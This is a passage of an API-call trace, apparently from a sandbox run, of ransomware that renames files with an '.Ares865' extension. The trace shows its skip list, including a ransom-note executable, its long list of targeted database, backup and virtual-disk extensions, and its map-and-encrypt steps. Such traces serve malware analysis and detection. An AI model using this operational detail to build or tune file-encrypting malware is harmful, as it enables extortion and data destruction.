[0085.105] lstrlenW (lpString="fol") returned 3 [0085.105] lstrcmpiW (lpString1="bmp", lpString2="fol") returned -1 [0085.105] lstrlenW (lpString="fp3") returned 3 [0085.105] lstrcmpiW (lpString1="bmp", lpString2="fp3") returned -1 [0085.105] lstrlenW (lpString="fp4") returned 3 [0085.105] lstrcmpiW (lpString1="bmp", lpString2="fp4") returned -1 [0085.105] lstrlenW (lpString="fp5") returned 3 [0085.105] lstrcmpiW (lpString1="bmp", lpString2="fp5") returned -1 [0085.105] lstrlenW (lpString="fp7") returned 3 [0085.105] lstrcmpiW (lpString1="bmp", lpString2="fp7") returned -1 [0085.105] lstrlenW (lpString="fpt") returned 3 [0085.105] lstrcmpiW (lpString1="bmp", lpString2="fpt") returned -1 [0085.105] lstrlenW (lpString="frm") returned 3 [0085.106] lstrcmpiW (lpString1="bmp", lpString2="frm") returned -1 [0085.106] lstrlenW (lpString="gdb") returned 3 [0085.106] lstrcmpiW (lpString1="bmp", lpString2="gdb") returned -1 [0085.106] lstrlenW (lpString="gdb") returned 3 [0085.106] lstrcmpiW (lpString1="bmp", lpString2="gdb") returned -1 [0085.106] lstrlenW (lpString="grdb") returned 4 [0085.106] lstrcmpiW (lpString1=".bmp", lpString2="grdb") returned -1 [0085.106] lstrlenW (lpString="gwi") returned 3 [0085.106] lstrcmpiW (lpString1="bmp", lpString2="gwi") returned -1 [0085.106] lstrlenW (lpString="hdb") returned 3 [0085.106] lstrcmpiW (lpString1="bmp", lpString2="hdb") returned -1 [0085.106] lstrlenW (lpString="his") returned 3 [0085.106] lstrcmpiW (lpString1="bmp", lpString2="his") returned -1 [0085.106] lstrlenW (lpString="ib") returned 2 [0085.106] lstrcmpiW (lpString1="mp", lpString2="ib") returned 1 [0085.106] lstrlenW (lpString="idb") returned 3 [0085.106] lstrcmpiW (lpString1="bmp", lpString2="idb") returned -1 [0085.106] lstrlenW (lpString="ihx") returned 3 [0085.106] lstrcmpiW (lpString1="bmp", lpString2="ihx") returned -1 [0085.106] lstrlenW (lpString="itdb") returned 4 [0085.106] lstrcmpiW (lpString1=".bmp", lpString2="itdb") returned -1 [0085.106] lstrlenW (lpString="itw") returned 3 [0085.106] lstrcmpiW (lpString1="bmp", lpString2="itw") returned -1 [0085.106] lstrlenW (lpString="jet") returned 3 [0085.106] lstrcmpiW (lpString1="bmp", lpString2="jet") returned -1 [0085.106] lstrlenW (lpString="jtx") returned 3 [0085.106] lstrcmpiW (lpString1="bmp", lpString2="jtx") returned -1 [0085.106] lstrlenW (lpString="kdb") returned 3 [0085.106] lstrcmpiW (lpString1="bmp", lpString2="kdb") returned -1 [0085.106] lstrlenW (lpString="kexi") returned 4 [0085.106] lstrcmpiW (lpString1=".bmp", lpString2="kexi") returned -1 [0085.106] lstrlenW (lpString="kexic") returned 5 [0085.106] lstrcmpiW (lpString1="9.bmp", lpString2="kexic") returned -1 [0085.106] lstrlenW (lpString="kexis") returned 5 [0085.106] lstrcmpiW (lpString1="9.bmp", lpString2="kexis") returned -1 [0085.106] lstrlenW (lpString="lgc") returned 3 [0085.107] lstrcmpiW (lpString1="bmp", lpString2="lgc") returned -1 [0085.107] lstrlenW (lpString="lwx") returned 3 [0085.107] lstrcmpiW (lpString1="bmp", lpString2="lwx") returned -1 [0085.107] lstrlenW (lpString="maf") returned 3 [0085.107] lstrcmpiW (lpString1="bmp", lpString2="maf") returned -1 [0085.107] lstrlenW (lpString="maq") returned 3 [0085.107] lstrcmpiW (lpString1="bmp", lpString2="maq") returned -1 [0085.107] lstrlenW (lpString="mar") returned 3 [0085.107] lstrcmpiW (lpString1="bmp", lpString2="mar") returned -1 [0085.107] lstrlenW (lpString="marshal") returned 7 [0085.107] lstrcmpiW (lpString1="e29.bmp", lpString2="marshal") returned -1 [0085.107] lstrlenW (lpString="mas") returned 3 [0085.107] lstrcmpiW (lpString1="bmp", lpString2="mas") returned -1 [0085.107] lstrlenW (lpString="mav") returned 3 [0085.107] lstrcmpiW (lpString1="bmp", lpString2="mav") returned -1 [0085.107] lstrlenW (lpString="maw") returned 3 [0085.107] lstrcmpiW (lpString1="bmp", lpString2="maw") returned -1 [0085.107] lstrlenW (lpString="mdbhtml") returned 7 [0085.107] lstrcmpiW (lpString1="e29.bmp", lpString2="mdbhtml") returned -1 [0085.107] lstrlenW (lpString="mdn") returned 3 [0085.107] lstrcmpiW (lpString1="bmp", lpString2="mdn") returned -1 [0085.107] lstrlenW (lpString="mdt") returned 3 [0085.107] lstrcmpiW (lpString1="bmp", lpString2="mdt") returned -1 [0085.107] lstrlenW (lpString="mfd") returned 3 [0085.107] lstrcmpiW (lpString1="bmp", lpString2="mfd") returned -1 [0085.107] lstrlenW (lpString="mpd") returned 3 [0085.107] lstrcmpiW (lpString1="bmp", lpString2="mpd") returned -1 [0085.107] lstrlenW (lpString="mrg") returned 3 [0085.107] lstrcmpiW (lpString1="bmp", lpString2="mrg") returned -1 [0085.107] lstrlenW (lpString="mud") returned 3 [0085.107] lstrcmpiW (lpString1="bmp", lpString2="mud") returned -1 [0085.107] lstrlenW (lpString="mwb") returned 3 [0085.107] lstrcmpiW (lpString1="bmp", lpString2="mwb") returned -1 [0085.108] lstrlenW (lpString="myd") returned 3 [0085.108] lstrcmpiW (lpString1="bmp", lpString2="myd") returned -1 [0085.108] lstrlenW (lpString="ndf") returned 3 [0085.108] lstrcmpiW (lpString1="bmp", lpString2="ndf") returned -1 [0085.108] lstrlenW (lpString="nnt") returned 3 [0085.108] lstrcmpiW (lpString1="bmp", lpString2="nnt") returned -1 [0085.108] lstrlenW (lpString="nrmlib") returned 6 [0085.108] lstrcmpiW (lpString1="29.bmp", lpString2="nrmlib") returned -1 [0085.108] lstrlenW (lpString="ns2") returned 3 [0085.108] lstrcmpiW (lpString1="bmp", lpString2="ns2") returned -1 [0085.108] lstrlenW (lpString="ns3") returned 3 [0085.108] lstrcmpiW (lpString1="bmp", lpString2="ns3") returned -1 [0085.108] lstrlenW (lpString="ns4") returned 3 [0085.108] lstrcmpiW (lpString1="bmp", lpString2="ns4") returned -1 [0085.108] lstrlenW (lpString="nsf") returned 3 [0085.108] lstrcmpiW (lpString1="bmp", lpString2="nsf") returned -1 [0085.108] lstrlenW (lpString="nv") returned 2 [0085.108] lstrcmpiW (lpString1="mp", lpString2="nv") returned -1 [0085.108] lstrlenW (lpString="nv2") returned 3 [0085.108] lstrcmpiW (lpString1="bmp", lpString2="nv2") returned -1 [0085.108] lstrlenW (lpString="nwdb") returned 4 [0085.108] lstrcmpiW (lpString1=".bmp", lpString2="nwdb") returned -1 [0085.108] lstrlenW (lpString="nyf") returned 3 [0085.108] lstrcmpiW (lpString1="bmp", lpString2="nyf") returned -1 [0085.108] lstrlenW (lpString="odb") returned 3 [0085.108] lstrcmpiW (lpString1="bmp", lpString2="odb") returned -1 [0085.108] lstrlenW (lpString="odb") returned 3 [0085.108] lstrcmpiW (lpString1="bmp", lpString2="odb") returned -1 [0085.108] lstrlenW (lpString="oqy") returned 3 [0085.108] lstrcmpiW (lpString1="bmp", lpString2="oqy") returned -1 [0085.108] lstrlenW (lpString="ora") returned 3 [0085.108] lstrcmpiW (lpString1="bmp", lpString2="ora") returned -1 [0085.108] lstrlenW (lpString="orx") returned 3 [0085.108] lstrcmpiW (lpString1="bmp", lpString2="orx") returned -1 [0085.108] lstrlenW (lpString="owc") returned 3 [0085.108] lstrcmpiW (lpString1="bmp", lpString2="owc") returned -1 [0085.108] lstrlenW (lpString="p96") returned 3 [0085.108] lstrcmpiW (lpString1="bmp", lpString2="p96") returned -1 [0085.109] lstrlenW (lpString="p97") returned 3 [0085.109] lstrcmpiW (lpString1="bmp", lpString2="p97") returned -1 [0085.109] lstrlenW (lpString="pan") returned 3 [0085.109] lstrcmpiW (lpString1="bmp", lpString2="pan") returned -1 [0085.109] lstrlenW (lpString="pdb") returned 3 [0085.109] lstrcmpiW (lpString1="bmp", lpString2="pdb") returned -1 [0085.109] lstrlenW (lpString="pdm") returned 3 [0085.109] lstrcmpiW (lpString1="bmp", lpString2="pdm") returned -1 [0085.109] lstrlenW (lpString="pnz") returned 3 [0085.109] lstrcmpiW (lpString1="bmp", lpString2="pnz") returned -1 [0085.109] lstrlenW (lpString="qry") returned 3 [0085.109] lstrcmpiW (lpString1="bmp", lpString2="qry") returned -1 [0085.109] lstrlenW (lpString="qvd") returned 3 [0085.109] lstrcmpiW (lpString1="bmp", lpString2="qvd") returned -1 [0085.109] lstrlenW (lpString="rbf") returned 3 [0085.109] lstrcmpiW (lpString1="bmp", lpString2="rbf") returned -1 [0085.109] lstrlenW (lpString="rctd") returned 4 [0085.109] lstrcmpiW (lpString1=".bmp", lpString2="rctd") returned -1 [0085.109] lstrlenW (lpString="rod") returned 3 [0085.109] lstrcmpiW (lpString1="bmp", lpString2="rod") returned -1 [0085.109] lstrlenW (lpString="rodx") returned 4 [0085.109] lstrcmpiW (lpString1=".bmp", lpString2="rodx") returned -1 [0085.109] lstrlenW (lpString="rpd") returned 3 [0085.109] lstrcmpiW (lpString1="bmp", lpString2="rpd") returned -1 [0085.109] lstrlenW (lpString="rsd") returned 3 [0085.109] lstrcmpiW (lpString1="bmp", lpString2="rsd") returned -1 [0085.109] lstrlenW (lpString="sas7bdat") returned 8 [0085.109] lstrcmpiW (lpString1="le29.bmp", lpString2="sas7bdat") returned -1 [0085.109] lstrlenW (lpString="sbf") returned 3 [0085.109] lstrcmpiW (lpString1="bmp", lpString2="sbf") returned -1 [0085.109] lstrlenW (lpString="scx") returned 3 [0085.109] lstrcmpiW (lpString1="bmp", lpString2="scx") returned -1 [0085.109] lstrlenW (lpString="sdb") returned 3 [0085.109] lstrcmpiW (lpString1="bmp", lpString2="sdb") returned -1 [0085.109] lstrlenW (lpString="sdc") returned 3 [0085.109] lstrcmpiW (lpString1="bmp", lpString2="sdc") returned -1 [0085.109] lstrlenW (lpString="sdf") returned 3 [0085.109] lstrcmpiW (lpString1="bmp", lpString2="sdf") returned -1 [0085.110] lstrlenW (lpString="sis") returned 3 [0085.110] lstrcmpiW (lpString1="bmp", lpString2="sis") returned -1 [0085.110] lstrlenW (lpString="spq") returned 3 [0085.110] lstrcmpiW (lpString1="bmp", lpString2="spq") returned -1 [0085.110] lstrlenW (lpString="te") returned 2 [0085.110] lstrcmpiW (lpString1="mp", lpString2="te") returned -1 [0085.110] lstrlenW (lpString="teacher") returned 7 [0085.110] lstrcmpiW (lpString1="e29.bmp", lpString2="teacher") returned -1 [0085.110] lstrlenW (lpString="tmd") returned 3 [0085.110] lstrcmpiW (lpString1="bmp", lpString2="tmd") returned -1 [0085.110] lstrlenW (lpString="tps") returned 3 [0085.110] lstrcmpiW (lpString1="bmp", lpString2="tps") returned -1 [0085.110] lstrlenW (lpString="trc") returned 3 [0085.110] lstrcmpiW (lpString1="bmp", lpString2="trc") returned -1 [0085.110] lstrlenW (lpString="trc") returned 3 [0085.110] lstrcmpiW (lpString1="bmp", lpString2="trc") returned -1 [0085.110] lstrlenW (lpString="trm") returned 3 [0085.110] lstrcmpiW (lpString1="bmp", lpString2="trm") returned -1 [0085.110] lstrlenW (lpString="udb") returned 3 [0085.110] lstrcmpiW (lpString1="bmp", lpString2="udb") returned -1 [0085.110] lstrlenW (lpString="udl") returned 3 [0085.110] lstrcmpiW (lpString1="bmp", lpString2="udl") returned -1 [0085.110] lstrlenW (lpString="usr") returned 3 [0085.110] lstrcmpiW (lpString1="bmp", lpString2="usr") returned -1 [0085.110] lstrlenW (lpString="v12") returned 3 [0085.110] lstrcmpiW (lpString1="bmp", lpString2="v12") returned -1 [0085.110] lstrlenW (lpString="vis") returned 3 [0085.110] lstrcmpiW (lpString1="bmp", lpString2="vis") returned -1 [0085.110] lstrlenW (lpString="vpd") returned 3 [0085.110] lstrcmpiW (lpString1="bmp", lpString2="vpd") returned -1 [0085.110] lstrlenW (lpString="vvv") returned 3 [0085.110] lstrcmpiW (lpString1="bmp", lpString2="vvv") returned -1 [0085.110] lstrlenW (lpString="wdb") returned 3 [0085.110] lstrcmpiW (lpString1="bmp", lpString2="wdb") returned -1 [0085.110] lstrlenW (lpString="wmdb") returned 4 [0085.110] lstrcmpiW (lpString1=".bmp", lpString2="wmdb") returned -1 [0085.111] lstrlenW (lpString="wrk") returned 3 [0085.111] lstrcmpiW (lpString1="bmp", lpString2="wrk") returned -1 [0085.111] lstrlenW (lpString="xdb") returned 3 [0085.111] lstrcmpiW (lpString1="bmp", lpString2="xdb") returned -1 [0085.111] lstrlenW (lpString="xld") returned 3 [0085.111] lstrcmpiW (lpString1="bmp", lpString2="xld") returned -1 [0085.111] lstrlenW (lpString="xmlff") returned 5 [0085.111] lstrcmpiW (lpString1="9.bmp", lpString2="xmlff") returned -1 [0085.111] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile29.bmp.Ares865") returned 90 [0085.111] MoveFileExW (lpExistingFileName="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile29.bmp" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\default pictures\\usertile29.bmp"), lpNewFileName="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile29.bmp.Ares865" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\default pictures\\usertile29.bmp.ares865"), dwFlags=0x1) returned 1 [0085.112] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile29.bmp.Ares865" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\default pictures\\usertile29.bmp.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0085.112] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=49208) returned 1 [0085.112] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0085.112] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2ef0 [0085.113] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f0518 [0085.113] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0380) returned 1 [0085.113] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0085.113] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0085.114] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0xc340, lpName=0x0) returned 0x15c [0085.117] MapViewOfFile (hFileMappingObject=0x15c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xc340) returned 0x190000 [0085.120] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0380) returned 1 [0085.121] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0085.121] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0085.121] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2f68 [0085.121] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2f68 | out: hHeap=0x2b0000) returned 1 [0085.121] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x100) returned 0x31afc8 [0085.121] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x32afc8 [0085.121] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x31afc8 | out: hHeap=0x2b0000) returned 1 [0085.121] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x32b0e0 [0085.121] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x208) returned 0x2d9d88 [0085.122] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x32b0e0 | out: hHeap=0x2b0000) returned 1 [0085.122] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d9d88 | out: hHeap=0x2b0000) returned 1 [0085.122] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x32afc8 | out: hHeap=0x2b0000) returned 1 [0085.122] UnmapViewOfFile (lpBaseAddress=0x190000) returned 1 [0085.122] CloseHandle (hObject=0x15c) returned 1 [0085.122] CloseHandle (hObject=0x118) returned 1 [0085.122] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2ef0 | out: hHeap=0x2b0000) returned 1 [0085.122] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f0518 | out: hHeap=0x2b0000) returned 1 [0085.122] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cd0020 | out: hHeap=0x2b0000) returned 1 [0085.123] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xae46478a, ftCreationTime.dwHighDateTime=0x1ca040d, ftLastAccessTime.dwLowDateTime=0xae46478a, ftLastAccessTime.dwHighDateTime=0x1ca040d, ftLastWriteTime.dwLowDateTime=0xdd3fc00f, ftLastWriteTime.dwHighDateTime=0x1c9ea0a, nFileSizeHigh=0x0, nFileSizeLow=0xc038, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="usertile30.bmp", cAlternateFileName="")) returned 1 [0085.123] lstrcmpiW (lpString1="usertile30.bmp", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0085.123] lstrcmpiW (lpString1="usertile30.bmp", lpString2="aoldtz.exe") returned 1 [0085.123] lstrcmpiW (lpString1="usertile30.bmp", lpString2=".") returned 1 [0085.123] lstrcmpiW (lpString1="usertile30.bmp", lpString2="..") returned 1 [0085.123] lstrcmpiW (lpString1="usertile30.bmp", lpString2="windows") returned -1 [0085.123] lstrcmpiW (lpString1="usertile30.bmp", lpString2="bootmgr") returned 1 [0085.123] lstrcmpiW (lpString1="usertile30.bmp", lpString2="temp") returned 1 [0085.123] lstrcmpiW (lpString1="usertile30.bmp", lpString2="pagefile.sys") returned 1 [0085.123] lstrcmpiW (lpString1="usertile30.bmp", lpString2="boot") returned 1 [0085.123] lstrcmpiW (lpString1="usertile30.bmp", lpString2="ids.txt") returned 1 [0085.123] lstrcmpiW (lpString1="usertile30.bmp", lpString2="ntuser.dat") returned 1 [0085.123] lstrcmpiW (lpString1="usertile30.bmp", lpString2="perflogs") returned 1 [0085.123] lstrcmpiW (lpString1="usertile30.bmp", lpString2="MSBuild") returned 1 [0085.123] lstrlenW (lpString="usertile30.bmp") returned 14 [0085.123] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile29.bmp") returned 82 [0085.123] lstrcpyW (in: lpString1=0x2cce488, lpString2="usertile30.bmp" | out: lpString1="usertile30.bmp") returned="usertile30.bmp" [0085.123] lstrlenW (lpString="usertile30.bmp") returned 14 [0085.123] lstrlenW (lpString="Ares865") returned 7 [0085.123] lstrcmpiW (lpString1="e30.bmp", lpString2="Ares865") returned 1 [0085.123] lstrlenW (lpString=".dll") returned 4 [0085.123] lstrcmpiW (lpString1="usertile30.bmp", lpString2=".dll") returned 1 [0085.123] lstrlenW (lpString=".lnk") returned 4 [0085.124] lstrcmpiW (lpString1="usertile30.bmp", lpString2=".lnk") returned 1 [0085.124] lstrlenW (lpString=".ini") returned 4 [0085.124] lstrcmpiW (lpString1="usertile30.bmp", lpString2=".ini") returned 1 [0085.124] lstrlenW (lpString=".sys") returned 4 [0085.124] lstrcmpiW (lpString1="usertile30.bmp", lpString2=".sys") returned 1 [0085.124] lstrlenW (lpString="usertile30.bmp") returned 14 [0085.124] lstrlenW (lpString="bak") returned 3 [0085.124] lstrcmpiW (lpString1="bmp", lpString2="bak") returned 1 [0085.124] lstrlenW (lpString="ba_") returned 3 [0085.124] lstrcmpiW (lpString1="bmp", lpString2="ba_") returned 1 [0085.124] lstrlenW (lpString="dbb") returned 3 [0085.124] lstrcmpiW (lpString1="bmp", lpString2="dbb") returned -1 [0085.124] lstrlenW (lpString="vmdk") returned 4 [0085.124] lstrcmpiW (lpString1=".bmp", lpString2="vmdk") returned -1 [0085.124] lstrlenW (lpString="rar") returned 3 [0085.124] lstrcmpiW (lpString1="bmp", lpString2="rar") returned -1 [0085.124] lstrlenW (lpString="zip") returned 3 [0085.124] lstrcmpiW (lpString1="bmp", lpString2="zip") returned -1 [0085.124] lstrlenW (lpString="tgz") returned 3 [0085.124] lstrcmpiW (lpString1="bmp", lpString2="tgz") returned -1 [0085.124] lstrlenW (lpString="vbox") returned 4 [0085.124] lstrcmpiW (lpString1=".bmp", lpString2="vbox") returned -1 [0085.124] lstrlenW (lpString="vdi") returned 3 [0085.124] lstrcmpiW (lpString1="bmp", lpString2="vdi") returned -1 [0085.124] lstrlenW (lpString="vhd") returned 3 [0085.124] lstrcmpiW (lpString1="bmp", lpString2="vhd") returned -1 [0085.124] lstrlenW (lpString="vhdx") returned 4 [0085.124] lstrcmpiW (lpString1=".bmp", lpString2="vhdx") returned -1 [0085.124] lstrlenW (lpString="avhd") returned 4 [0085.124] lstrcmpiW (lpString1=".bmp", lpString2="avhd") returned -1 [0085.124] lstrlenW (lpString="db") returned 2 [0085.124] lstrcmpiW (lpString1="mp", lpString2="db") returned 1 [0085.124] lstrlenW (lpString="db2") returned 3 [0085.124] lstrcmpiW (lpString1="bmp", lpString2="db2") returned -1 [0085.124] lstrlenW (lpString="db3") returned 3 [0085.124] lstrcmpiW (lpString1="bmp", lpString2="db3") returned -1 [0085.124] lstrlenW (lpString="dbf") returned 3 [0085.124] lstrcmpiW (lpString1="bmp", lpString2="dbf") returned -1 [0085.125] lstrlenW (lpString="mdf") returned 3 [0085.125] lstrcmpiW (lpString1="bmp", lpString2="mdf") returned -1 [0085.125] lstrlenW (lpString="mdb") returned 3 [0085.125] lstrcmpiW (lpString1="bmp", lpString2="mdb") returned -1 [0085.125] lstrlenW (lpString="sql") returned 3 [0085.125] lstrcmpiW (lpString1="bmp", lpString2="sql") returned -1 [0085.125] lstrlenW (lpString="sqlite") returned 6 [0085.125] lstrcmpiW (lpString1="30.bmp", lpString2="sqlite") returned -1 [0085.125] lstrlenW (lpString="sqlite3") returned 7 [0085.125] lstrcmpiW (lpString1="e30.bmp", lpString2="sqlite3") returned -1 [0085.125] lstrlenW (lpString="sqlitedb") returned 8 [0085.125] lstrcmpiW (lpString1="le30.bmp", lpString2="sqlitedb") returned -1 [0085.125] lstrlenW (lpString="xml") returned 3 [0085.125] lstrcmpiW (lpString1="bmp", lpString2="xml") returned -1 [0085.125] lstrlenW (lpString="$er") returned 3 [0085.125] lstrcmpiW (lpString1="bmp", lpString2="$er") returned 1 [0085.125] lstrlenW (lpString="4dd") returned 3 [0085.125] lstrcmpiW (lpString1="bmp", lpString2="4dd") returned 1 [0085.125] lstrlenW (lpString="4dl") returned 3 [0085.125] lstrcmpiW (lpString1="bmp", lpString2="4dl") returned 1 [0085.125] lstrlenW (lpString="^^^") returned 3 [0085.125] lstrcmpiW (lpString1="bmp", lpString2="^^^") returned 1 [0085.125] lstrlenW (lpString="abs") returned 3 [0085.125] lstrcmpiW (lpString1="bmp", lpString2="abs") returned 1 [0085.125] lstrlenW (lpString="abx") returned 3 [0085.125] lstrcmpiW (lpString1="bmp", lpString2="abx") returned 1 [0085.125] lstrlenW (lpString="accdb") returned 5 [0085.125] lstrcmpiW (lpString1="0.bmp", lpString2="accdb") returned -1 [0085.125] lstrlenW (lpString="accdc") returned 5 [0085.125] lstrcmpiW (lpString1="0.bmp", lpString2="accdc") returned -1 [0085.125] lstrlenW (lpString="accde") returned 5 [0085.125] lstrcmpiW (lpString1="0.bmp", lpString2="accde") returned -1 [0085.125] lstrlenW (lpString="accdr") returned 5 [0085.125] lstrcmpiW (lpString1="0.bmp", lpString2="accdr") returned -1 [0085.125] lstrlenW (lpString="accdt") returned 5 [0085.125] lstrcmpiW (lpString1="0.bmp", lpString2="accdt") returned -1 [0085.125] lstrlenW (lpString="accdw") returned 5 [0085.126] lstrcmpiW (lpString1="0.bmp", lpString2="accdw") returned -1 [0085.126] lstrlenW (lpString="accft") returned 5 [0085.126] lstrcmpiW (lpString1="0.bmp", lpString2="accft") returned -1 [0085.126] lstrlenW (lpString="adb") returned 3 [0085.126] lstrcmpiW (lpString1="bmp", lpString2="adb") returned 1 [0085.126] lstrlenW (lpString="adb") returned 3 [0085.126] lstrcmpiW (lpString1="bmp", lpString2="adb") returned 1 [0085.126] lstrlenW (lpString="ade") returned 3 [0085.126] lstrcmpiW (lpString1="bmp", lpString2="ade") returned 1 [0085.126] lstrlenW (lpString="adf") returned 3 [0085.126] lstrcmpiW (lpString1="bmp", lpString2="adf") returned 1 [0085.126] lstrlenW (lpString="adn") returned 3 [0085.126] lstrcmpiW (lpString1="bmp", lpString2="adn") returned 1 [0085.126] lstrlenW (lpString="adp") returned 3 [0085.126] lstrcmpiW (lpString1="bmp", lpString2="adp") returned 1 [0085.126] lstrlenW (lpString="alf") returned 3 [0085.126] lstrcmpiW (lpString1="bmp", lpString2="alf") returned 1 [0085.126] lstrlenW (lpString="ask") returned 3 [0085.126] lstrcmpiW (lpString1="bmp", lpString2="ask") returned 1 [0085.126] lstrlenW (lpString="btr") returned 3 [0085.126] lstrcmpiW (lpString1="bmp", lpString2="btr") returned -1 [0085.126] lstrlenW (lpString="cat") returned 3 [0085.126] lstrcmpiW (lpString1="bmp", lpString2="cat") returned -1 [0085.126] lstrlenW (lpString="cdb") returned 3 [0085.126] lstrcmpiW (lpString1="bmp", lpString2="cdb") returned -1 [0085.126] lstrlenW (lpString="ckp") returned 3 [0085.126] lstrcmpiW (lpString1="bmp", lpString2="ckp") returned -1 [0085.126] lstrlenW (lpString="cma") returned 3 [0085.126] lstrcmpiW (lpString1="bmp", lpString2="cma") returned -1 [0085.126] lstrlenW (lpString="cpd") returned 3 [0085.126] lstrcmpiW (lpString1="bmp", lpString2="cpd") returned -1 [0085.126] lstrlenW (lpString="dacpac") returned 6 [0085.126] lstrcmpiW (lpString1="30.bmp", lpString2="dacpac") returned -1 [0085.126] lstrlenW (lpString="dad") returned 3 [0085.126] lstrcmpiW (lpString1="bmp", lpString2="dad") returned -1 [0085.126] lstrlenW (lpString="dadiagrams") returned 10 [0085.127] lstrcmpiW (lpString1="tile30.bmp", lpString2="dadiagrams") returned 1 [0085.127] lstrlenW (lpString="daschema") returned 8 [0085.127] lstrcmpiW (lpString1="le30.bmp", lpString2="daschema") returned 1 [0085.127] lstrlenW (lpString="db-journal") returned 10 [0085.127] lstrcmpiW (lpString1="tile30.bmp", lpString2="db-journal") returned 1 [0085.127] lstrlenW (lpString="db-shm") returned 6 [0085.127] lstrcmpiW (lpString1="30.bmp", lpString2="db-shm") returned -1 [0085.127] lstrlenW (lpString="db-wal") returned 6 [0085.127] lstrcmpiW (lpString1="30.bmp", lpString2="db-wal") returned -1 [0085.127] lstrlenW (lpString="dbc") returned 3 [0085.127] lstrcmpiW (lpString1="bmp", lpString2="dbc") returned -1 [0085.127] lstrlenW (lpString="dbs") returned 3 [0085.127] lstrcmpiW (lpString1="bmp", lpString2="dbs") returned -1 [0085.127] lstrlenW (lpString="dbt") returned 3 [0085.127] lstrcmpiW (lpString1="bmp", lpString2="dbt") returned -1 [0085.127] lstrlenW (lpString="dbv") returned 3 [0085.127] lstrcmpiW (lpString1="bmp", lpString2="dbv") returned -1 [0085.127] lstrlenW (lpString="dbx") returned 3 [0085.127] lstrcmpiW (lpString1="bmp", lpString2="dbx") returned -1 [0085.127] lstrlenW (lpString="dcb") returned 3 [0085.127] lstrcmpiW (lpString1="bmp", lpString2="dcb") returned -1 [0085.127] lstrlenW (lpString="dct") returned 3 [0085.127] lstrcmpiW (lpString1="bmp", lpString2="dct") returned -1 [0085.127] lstrlenW (lpString="dcx") returned 3 [0085.127] lstrcmpiW (lpString1="bmp", lpString2="dcx") returned -1 [0085.127] lstrlenW (lpString="ddl") returned 3 [0085.127] lstrcmpiW (lpString1="bmp", lpString2="ddl") returned -1 [0085.127] lstrlenW (lpString="dlis") returned 4 [0085.127] lstrcmpiW (lpString1=".bmp", lpString2="dlis") returned -1 [0085.127] lstrlenW (lpString="dp1") returned 3 [0085.127] lstrcmpiW (lpString1="bmp", lpString2="dp1") returned -1 [0085.127] lstrlenW (lpString="dqy") returned 3 [0085.127] lstrcmpiW (lpString1="bmp", lpString2="dqy") returned -1 [0085.127] lstrlenW (lpString="dsk") returned 3 [0085.127] lstrcmpiW (lpString1="bmp", lpString2="dsk") returned -1 [0085.127] lstrlenW (lpString="dsn") returned 3 [0085.128] lstrcmpiW (lpString1="bmp", lpString2="dsn") returned -1 [0085.128] lstrlenW (lpString="dtsx") returned 4 [0085.128] lstrcmpiW (lpString1=".bmp", lpString2="dtsx") returned -1 [0085.128] lstrlenW (lpString="dxl") returned 3 [0085.128] lstrcmpiW (lpString1="bmp", lpString2="dxl") returned -1 [0085.128] lstrlenW (lpString="eco") returned 3 [0085.128] 